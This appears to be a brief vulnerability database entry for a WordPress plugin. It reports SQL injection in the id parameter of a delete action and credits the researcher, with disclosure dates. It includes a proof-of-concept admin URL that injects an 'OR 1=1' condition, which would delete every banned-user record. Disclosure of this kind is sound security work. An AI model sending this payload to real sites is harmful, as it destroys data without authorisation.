The plugin is affected by a SQL Injection in the id parameter of the delete action.
http://127.0.0.1:8001/wp-admin/admin.php?page=aicp_banned_user_details&action=delete&id=0)%20OR%201=1%20--%20k
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-14 (about 1 years ago)
2022-01-14 (about 1 years ago)
2022-04-12 (about 9 months ago)